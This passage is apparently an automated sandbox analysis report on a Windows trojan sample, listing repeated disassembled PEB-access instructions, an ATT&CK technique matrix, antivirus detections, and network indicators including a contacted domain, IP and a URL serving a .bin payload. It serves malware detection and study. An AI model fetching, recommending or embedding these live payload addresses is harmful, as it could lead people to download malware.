    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61070 mov eax, dword ptr fs:[00000030h]5_2_36D61070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DCD070 mov ecx, dword ptr fs:[00000030h]5_2_36DCD070
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD106E mov eax, dword ptr fs:[00000030h]5_2_36DD106E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1903E mov eax, dword ptr fs:[00000030h]5_2_36E1903E
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E231E1 mov eax, dword ptr fs:[00000030h]5_2_36E231E1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D1D0 mov eax, dword ptr fs:[00000030h]5_2_36D8D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8D1D0 mov ecx, dword ptr fs:[00000030h]5_2_36D8D1D0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF71F9 mov esi, dword ptr fs:[00000030h]5_2_36DF71F9
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E251CB mov eax, dword ptr fs:[00000030h]5_2_36E251CB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D551ED mov eax, dword ptr fs:[00000030h]5_2_36D551ED
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D751EF mov eax, dword ptr fs:[00000030h]5_2_36D751EF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E011A4 mov eax, dword ptr fs:[00000030h]5_2_36E011A4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DA7190 mov eax, dword ptr fs:[00000030h]5_2_36DA7190
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E05180 mov eax, dword ptr fs:[00000030h]5_2_36E05180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E05180 mov eax, dword ptr fs:[00000030h]5_2_36E05180
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6B1B0 mov eax, dword ptr fs:[00000030h]5_2_36D6B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57152 mov eax, dword ptr fs:[00000030h]5_2_36D57152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D49148 mov eax, dword ptr fs:[00000030h]5_2_36D49148
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE3140 mov eax, dword ptr fs:[00000030h]5_2_36DE3140
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4F172 mov eax, dword ptr fs:[00000030h]5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DE9179 mov eax, dword ptr fs:[00000030h]5_2_36DE9179
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25152 mov eax, dword ptr fs:[00000030h]5_2_36E25152
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E27120 mov eax, dword ptr fs:[00000030h]5_2_36E27120
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]5_2_36D4B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]5_2_36D4B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]5_2_36D4B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4B136 mov eax, dword ptr fs:[00000030h]5_2_36D4B136
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51131 mov eax, dword ptr fs:[00000030h]5_2_36D51131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51131 mov eax, dword ptr fs:[00000030h]5_2_36D51131
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]5_2_36E1BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]5_2_36E1BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]5_2_36E1BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E1BEE6 mov eax, dword ptr fs:[00000030h]5_2_36E1BEE6
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D4BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D4BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D5BEC0 mov eax, dword ptr fs:[00000030h]5_2_36D5BEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D7FEC0 mov eax, dword ptr fs:[00000030h]5_2_36D7FEC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDFEC5 mov eax, dword ptr fs:[00000030h]5_2_36DDFEC5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]5_2_36D53EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]5_2_36D53EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53EF4 mov eax, dword ptr fs:[00000030h]5_2_36D53EF4
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D83EEB mov ecx, dword ptr fs:[00000030h]5_2_36D83EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D83EEB mov eax, dword ptr fs:[00000030h]5_2_36D83EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D83EEB mov eax, dword ptr fs:[00000030h]5_2_36D83EEB
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53EE1 mov eax, dword ptr fs:[00000030h]5_2_36D53EE1
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E09EDF mov eax, dword ptr fs:[00000030h]5_2_36E09EDF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E09EDF mov eax, dword ptr fs:[00000030h]5_2_36E09EDF
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D57E96 mov eax, dword ptr fs:[00000030h]5_2_36D57E96
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDDE9B mov eax, dword ptr fs:[00000030h]5_2_36DDDE9B
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0DEB0 mov eax, dword ptr fs:[00000030h]5_2_36E0DEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D83E8F mov eax, dword ptr fs:[00000030h]5_2_36D83E8F
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]5_2_36DFDEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDEB0 mov ecx, dword ptr fs:[00000030h]5_2_36DFDEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]5_2_36DFDEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]5_2_36DFDEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DFDEB0 mov eax, dword ptr fs:[00000030h]5_2_36DFDEB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4DEA5 mov eax, dword ptr fs:[00000030h]5_2_36D4DEA5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4DEA5 mov ecx, dword ptr fs:[00000030h]5_2_36D4DEA5
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4FEA0 mov eax, dword ptr fs:[00000030h]5_2_36D4FEA0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DDDEAA mov eax, dword ptr fs:[00000030h]5_2_36DDDEAA
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BE51 mov eax, dword ptr fs:[00000030h]5_2_36D8BE51
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BE51 mov eax, dword ptr fs:[00000030h]5_2_36D8BE51
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF9E56 mov ecx, dword ptr fs:[00000030h]5_2_36DF9E56
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D65E40 mov eax, dword ptr fs:[00000030h]5_2_36D65E40
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0DE46 mov eax, dword ptr fs:[00000030h]5_2_36E0DE46
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4BE78 mov ecx, dword ptr fs:[00000030h]5_2_36D4BE78
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4DE10 mov eax, dword ptr fs:[00000030h]5_2_36D4DE10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BE17 mov eax, dword ptr fs:[00000030h]5_2_36D8BE17
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]5_2_36E25E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]5_2_36E25E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E25E37 mov eax, dword ptr fs:[00000030h]5_2_36E25E37
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51E30 mov eax, dword ptr fs:[00000030h]5_2_36D51E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D51E30 mov eax, dword ptr fs:[00000030h]5_2_36D51E30
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E23E10 mov eax, dword ptr fs:[00000030h]5_2_36E23E10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E23E10 mov eax, dword ptr fs:[00000030h]5_2_36E23E10
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]5_2_36D6DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]5_2_36D6DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D6DE2D mov eax, dword ptr fs:[00000030h]5_2_36D6DE2D
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4BFD0 mov eax, dword ptr fs:[00000030h]5_2_36D4BFD0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DD3FD7 mov eax, dword ptr fs:[00000030h]5_2_36DD3FD7
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]5_2_36D81FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]5_2_36D81FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D81FCD mov eax, dword ptr fs:[00000030h]5_2_36D81FCD
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D53FC2 mov eax, dword ptr fs:[00000030h]5_2_36D53FC2
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0BFC0 mov ecx, dword ptr fs:[00000030h]5_2_36E0BFC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E0BFC0 mov eax, dword ptr fs:[00000030h]5_2_36E0BFC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36E23FC0 mov eax, dword ptr fs:[00000030h]5_2_36E23FC0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]5_2_36D8BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]5_2_36D8BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BFEC mov eax, dword ptr fs:[00000030h]5_2_36D8BFEC
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov ecx, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D61F92 mov eax, dword ptr fs:[00000030h]5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D4FF90 mov edi, dword ptr fs:[00000030h]5_2_36D4FF90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF3F90 mov eax, dword ptr fs:[00000030h]5_2_36DF3F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36DF3F90 mov eax, dword ptr fs:[00000030h]5_2_36DF3F90
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D91FB8 mov eax, dword ptr fs:[00000030h]5_2_36D91FB8
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 5_2_36D8BFB0 mov eax, dword ptr fs:[00000030h]5_2_36D8BFB0
    Source: C:\Users\user\Desktop\3507071243740008011.exeCode function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403373

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API    		1
    DLL Side-Loading    		1
    Access Token Manipulation    		1
    Masquerading    		OS Credential Dumping211
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		11
    Encrypted Channel    		Exfiltration Over Other Network Medium1
    System Shutdown/Reboot
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Process Injection    		1
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Virtualization/Sandbox Evasion    		Remote Desktop Protocol1
    Clipboard Data    		1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading    		1
    Access Token Manipulation    		Security Account Manager2
    File and Directory Discovery    		SMB/Windows Admin SharesData from Network Shared Drive2
    Non-Application Layer Protocol    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Process Injection    		NTDS23
    System Information Discovery    		Distributed Component Object ModelInput Capture3
    Application Layer Protocol    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Deobfuscate/Decode Files or Information    		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
    Obfuscated Files or Information    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    3507071243740008011.exe32%ReversingLabsWin32.Trojan.InjectorX
    3507071243740008011.exe100%AviraHEUR/AGEN.1337946

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    alfacen.com
    		193.107.36.30
    		truefalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binfalse
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
          		unknown
          http://www.ftp.ftp://ftp.gopher.3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
            		unknown
            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
              		unknown
              https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binL3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://nsis.sf.net/NSIS_ErrorError3507071243740008011.exe, 00000000.00000000.1711380790.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000005.00000000.2638137136.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                • URL Reputation: safe
                		unknown
